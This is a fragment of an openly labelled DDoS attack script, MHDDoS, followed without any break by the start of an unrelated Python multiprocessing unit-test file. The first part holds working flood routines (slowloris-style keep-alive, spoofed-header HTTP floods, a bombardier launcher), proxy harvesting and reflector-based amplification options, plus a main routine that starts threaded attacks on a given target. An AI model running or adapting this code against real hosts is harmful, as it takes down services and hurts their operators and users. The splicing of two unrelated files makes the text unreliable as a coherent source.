for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: str | bytes = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
pro = randchoice(self._proxies)
run([
f'{Path.home() / "go/bin/bombardier"}',
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--no-print',
'--timeout=5s',
f'--requests={self._rpc}',
f'--proxy={pro}',
f'{self._target.human_repr()}',
])
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % randint(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info("Downloading Proxies form %d Providers" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
"Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error('Download Proxy Error: %s' %
(e.__str__() or e.__repr__()))
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = "%s@BetterStresser:~#" % gethostname()
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print("%s command not found" % cmd)
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
print('please wait ...', end="\r")
with get(domain, timeout=20) as r:
print(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
return
print("Error!")
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info("TCP: %s\n" % (info['_tsdns._tcp.']))
logger.info("UDP: %s\n" % (info['_ts3._udp.']))
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
else:
logger.info(
"Empty Proxy File, running flood witout proxy")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path(__dir__ / "go/bin/bombardier")
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for _ in range(threads):
HttpFlood(url, host, method, rpc, event, uagents,
referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
"Attack Started to %s with %s method for %s seconds, threads: %d!"
% (target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
    """Encode the text *s* to bytes using the Latin-1 codec."""
    return bytes(s, 'latin')
def close_queue(queue):
    """Close *queue* and join its feeder thread, if it is a real mp Queue.

    Dummy/manager queues have no feeder thread and are left untouched.
    """
    if not isinstance(queue, multiprocessing.queues.Queue):
        return
    queue.close()
    queue.join_thread()
def join_process(process):
    """Join *process*, failing if it does not finish within the timeout.

    multiprocessing.Process exposes the same join()/is_alive() API as
    threading.Thread, so the thread-oriented support helper can be reused.
    """
    support.join_thread(process)
if os.name == "posix":
    from multiprocessing import resource_tracker

    def _resource_unlink(name, rtype):
        # Invoke the resource tracker's cleanup function directly to unlink a
        # named POSIX resource (e.g. a semaphore or shared-memory segment).
        resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
# Generic short delay (seconds) used throughout the tests.
DELTA = 0.1
CHECK_TIMINGS = False     # making true makes tests take a lot longer
                          # and can sometimes cause some non-serious
                          # failures because some calls block a bit
                          # longer than expected
if CHECK_TIMINGS:
    TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
    TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
# Some platforms ship a sem_getvalue() that always fails; skip value checks there.
HAVE_GETVALUE = not getattr(_multiprocessing,
                            'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
    """Wait until *handle* is ready; a negative timeout means block forever."""
    block_forever = timeout is not None and timeout < 0.0
    return wait([handle], None if block_forever else timeout)
# Highest file-descriptor number, with a conservative fallback where
# sysconf is unavailable.
try:
    MAXFD = os.sysconf("SC_OPEN_MAX")
except Exception:
    # Was a bare `except:`, which would also swallow KeyboardInterrupt
    # and SystemExit; narrowed to ordinary exceptions only.
    MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
    from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
    # Stand-ins so the module still imports when ctypes is missing.
    Structure = object
    c_int = c_double = c_longlong = None
def check_enough_semaphores():
    """Check that the system supports enough semaphores to run the test."""
    # Minimum number of semaphores available according to POSIX.
    nsems_min = 256
    try:
        nsems = os.sysconf("SC_SEM_NSEMS_MAX")
    except (AttributeError, ValueError):
        # sysconf not available, or the setting is not available.
        return
    # -1 means "no limit"; anything at or above the POSIX minimum is fine.
    if nsems != -1 and nsems < nsems_min:
        raise unittest.SkipTest("The OS doesn't support enough semaphores "
                                "to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
    """Callable proxy that records how long its last invocation took."""

    def __init__(self, func):
        self.func = func
        # Seconds taken by the most recent call; None until first called.
        self.elapsed = None

    def __call__(self, *args, **kwds):
        start = time.monotonic()
        try:
            return self.func(*args, **kwds)
        finally:
            # Record the duration even if the wrapped call raised.
            self.elapsed = time.monotonic() - start
#
# Base class for test cases
#
class BaseTestCase(object):
    """Mixin with helpers shared by every multiprocessing test case."""

    ALLOWED_TYPES = ('processes', 'manager', 'threads')

    def assertTimingAlmostEqual(self, a, b):
        # Timing checks are inherently flaky, so they are only enforced
        # when explicitly enabled via CHECK_TIMINGS.
        if CHECK_TIMINGS:
            self.assertAlmostEqual(a, b, 1)

    def assertReturnsIfImplemented(self, value, func, *args):
        # Some proxy objects legitimately raise NotImplementedError; in
        # that case the comparison is skipped rather than failed.
        try:
            res = func(*args)
        except NotImplementedError:
            return None
        return self.assertEqual(value, res)

    # For the sanity of Windows users, rather than crashing or freezing in
    # multiple ways.
    def __reduce__(self, *args):
        raise NotImplementedError("shouldn't try to pickle a test case")

    __reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
    """Return the current value of semaphore-like object *self*.

    Tries, in order: the object's own get_value() method, the private
    attribute used by threading.Semaphore, then multiprocessing's _value.
    Raises NotImplementedError when none of them exists.
    """
    try:
        return self.get_value()
    except AttributeError:
        pass
    try:
        return self._Semaphore__value
    except AttributeError:
        pass
    try:
        return self._value
    except AttributeError:
        raise NotImplementedError
#
# Testcases
#
class DummyCallable:
    """Picklable callable target used by _TestProcess.test_lose_target_ref."""
    def __call__(self, q, c):
        # *c* must arrive as a DummyCallable: the instance survived the trip
        # (pickling/unpickling, for real processes) to the child.
        assert isinstance(c, DummyCallable)
        q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
    def test_current(self):
        """current_process() describes a live, non-daemon process with a key."""
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        current = self.current_process()
        authkey = current.authkey
        self.assertTrue(current.is_alive())
        self.assertTrue(not current.daemon)
        self.assertIsInstance(authkey, bytes)
        self.assertTrue(len(authkey) > 0)
        # The main process's ident is its own pid, and it has no exit code yet.
        self.assertEqual(current.ident, os.getpid())
        self.assertEqual(current.exitcode, None)
    def test_daemon_argument(self):
        """Process(daemon=...) overrides the inherited daemon flag."""
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # By default uses the current process's daemon flag.
        proc0 = self.Process(target=self._test)
        self.assertEqual(proc0.daemon, self.current_process().daemon)
        proc1 = self.Process(target=self._test, daemon=True)
        self.assertTrue(proc1.daemon)
        proc2 = self.Process(target=self._test, daemon=False)
        self.assertFalse(proc2.daemon)
    @classmethod
    def _test(cls, q, *args, **kwds):
        """Child entry point: echo arguments and process metadata via *q*."""
        current = cls.current_process()
        q.put(args)
        q.put(kwds)
        q.put(current.name)
        if cls.TYPE != 'threads':
            # authkey and pid only make sense for real processes.
            q.put(bytes(current.authkey))
            q.put(current.pid)
    def test_parent_process_attributes(self):
        """parent_process() is None here; a child sees this process's pid/name."""
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        self.assertIsNone(self.parent_process())
        rconn, wconn = self.Pipe(duplex=False)
        p = self.Process(target=self._test_send_parent_process, args=(wconn,))
        p.start()
        p.join()
        parent_pid, parent_name = rconn.recv()
        self.assertEqual(parent_pid, self.current_process().pid)
        self.assertEqual(parent_pid, os.getpid())
        self.assertEqual(parent_name, self.current_process().name)
    @classmethod
    def _test_send_parent_process(cls, wconn):
        """Child entry point: report the parent's pid and name over *wconn*."""
        from multiprocessing.process import parent_process
        wconn.send([parent_process().pid, parent_process().name])
    def test_parent_process(self):
        """A grandchild observes the death of its parent (the killed child)."""
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # Launch a child process. Make it launch a grandchild process. Kill the
        # child process and make sure that the grandchild notices the death of
        # its parent (a.k.a the child process).
        rconn, wconn = self.Pipe(duplex=False)
        p = self.Process(
            target=self._test_create_grandchild_process, args=(wconn, ))
        p.start()
        if not rconn.poll(timeout=support.LONG_TIMEOUT):
            raise AssertionError("Could not communicate with child process")
        parent_process_status = rconn.recv()
        self.assertEqual(parent_process_status, "alive")
        p.terminate()
        p.join()
        if not rconn.poll(timeout=support.LONG_TIMEOUT):
            raise AssertionError("Could not communicate with child process")
        parent_process_status = rconn.recv()
        self.assertEqual(parent_process_status, "not alive")
    @classmethod
    def _test_create_grandchild_process(cls, wconn):
        """Child entry point: spawn a grandchild, then sleep until terminated."""
        p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
        p.start()
        # Sleep "forever"; the parent test terminates this process.
        time.sleep(300)
    @classmethod
    def _test_report_parent_status(cls, wconn):
        """Grandchild entry point: report parent liveness before/after join."""
        from multiprocessing.process import parent_process
        wconn.send("alive" if parent_process().is_alive() else "not alive")
        # join() returns once the parent dies (the test terminates it).
        parent_process().join(timeout=support.SHORT_TIMEOUT)
        wconn.send("alive" if parent_process().is_alive() else "not alive")
    def test_process(self):
        """End-to-end Process lifecycle: attrs, start, child output, join."""
        q = self.Queue(1)
        # NOTE(review): 'e' appears unused in this test body.
        e = self.Event()
        args = (q, 1, 2)
        kwargs = {'hello':23, 'bye':2.54}
        name = 'SomeProcess'
        p = self.Process(
            target=self._test, args=args, kwargs=kwargs, name=name
            )
        p.daemon = True
        current = self.current_process()
        if self.TYPE != 'threads':
            self.assertEqual(p.authkey, current.authkey)
        self.assertEqual(p.is_alive(), False)
        self.assertEqual(p.daemon, True)
        self.assertNotIn(p, self.active_children())
        self.assertTrue(type(self.active_children()) is list)
        self.assertEqual(p.exitcode, None)
        p.start()
        self.assertEqual(p.exitcode, None)
        self.assertEqual(p.is_alive(), True)
        self.assertIn(p, self.active_children())
        # _test echoes back its args (minus the queue itself), kwargs and name.
        self.assertEqual(q.get(), args[1:])
        self.assertEqual(q.get(), kwargs)
        self.assertEqual(q.get(), p.name)
        if self.TYPE != 'threads':
            self.assertEqual(q.get(), current.authkey)
            self.assertEqual(q.get(), p.pid)
        p.join()
        self.assertEqual(p.exitcode, 0)
        self.assertEqual(p.is_alive(), False)
        self.assertNotIn(p, self.active_children())
        close_queue(q)
    @unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
    def test_process_mainthread_native_id(self):
        """A child process's main thread has a different OS-level thread id."""
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        current_mainthread_native_id = threading.main_thread().native_id
        q = self.Queue(1)
        p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
        p.start()
        child_mainthread_native_id = q.get()
        p.join()
        close_queue(q)
        self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
    @classmethod
    def _test_process_mainthread_native_id(cls, q):
        """Child entry point: report our main thread's native id via *q*."""
        mainthread_native_id = threading.main_thread().native_id
        q.put(mainthread_native_id)
    @classmethod
    def _sleep_some(cls):
        # Sleep long enough that the test always terminates/kills us first.
        time.sleep(100)
    @classmethod
    def _test_sleep(cls, delay):
        """Child entry point: sleep for *delay* seconds, then exit cleanly."""
        time.sleep(delay)
    def _kill_process(self, meth):
        """Start a sleeping child, kill it via *meth*, return its exitcode.

        Shared driver for test_terminate/test_kill; *meth* is an unbound
        Process method (terminate or kill).
        """
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        p = self.Process(target=self._sleep_some)
        p.daemon = True
        p.start()
        self.assertEqual(p.is_alive(), True)
        self.assertIn(p, self.active_children())
        self.assertEqual(p.exitcode, None)
        join = TimingWrapper(p.join)
        # join with zero/negative timeout must return immediately,
        # leaving the child alive.
        self.assertEqual(join(0), None)
        self.assertTimingAlmostEqual(join.elapsed, 0.0)
        self.assertEqual(p.is_alive(), True)
        self.assertEqual(join(-1), None)
        self.assertTimingAlmostEqual(join.elapsed, 0.0)
        self.assertEqual(p.is_alive(), True)
        # XXX maybe terminating too soon causes the problems on Gentoo...
        time.sleep(1)
        meth(p)
        if hasattr(signal, 'alarm'):
            # On the Gentoo buildbot waitpid() often seems to block forever.
            # We use alarm() to interrupt it if it blocks for too long.
            def handler(*args):
                raise RuntimeError('join took too long: %s' % p)
            old_handler = signal.signal(signal.SIGALRM, handler)
            try:
                signal.alarm(10)
                self.assertEqual(join(), None)
            finally:
                signal.alarm(0)
                signal.signal(signal.SIGALRM, old_handler)
        else:
            self.assertEqual(join(), None)
        self.assertTimingAlmostEqual(join.elapsed, 0.0)
        self.assertEqual(p.is_alive(), False)
        self.assertNotIn(p, self.active_children())
        p.join()
        return p.exitcode
    def test_terminate(self):
        """terminate() ends the child with -SIGTERM (on POSIX)."""
        exitcode = self._kill_process(multiprocessing.Process.terminate)
        if os.name != 'nt':
            self.assertEqual(exitcode, -signal.SIGTERM)
    def test_kill(self):
        """kill() ends the child with -SIGKILL (on POSIX)."""
        exitcode = self._kill_process(multiprocessing.Process.kill)
        if os.name != 'nt':
            self.assertEqual(exitcode, -signal.SIGKILL)
    def test_cpu_count(self):
        """cpu_count() returns a positive int (or raises NotImplementedError)."""
        try:
            cpus = multiprocessing.cpu_count()
        except NotImplementedError:
            cpus = 1
        self.assertTrue(type(cpus) is int)
        self.assertTrue(cpus >= 1)
    def test_active_children(self):
        """A child appears in active_children() while running, then leaves."""
        self.assertEqual(type(self.active_children()), list)
        p = self.Process(target=time.sleep, args=(DELTA,))
        self.assertNotIn(p, self.active_children())
        p.daemon = True
        p.start()
        self.assertIn(p, self.active_children())
        p.join()
        self.assertNotIn(p, self.active_children())
    @classmethod
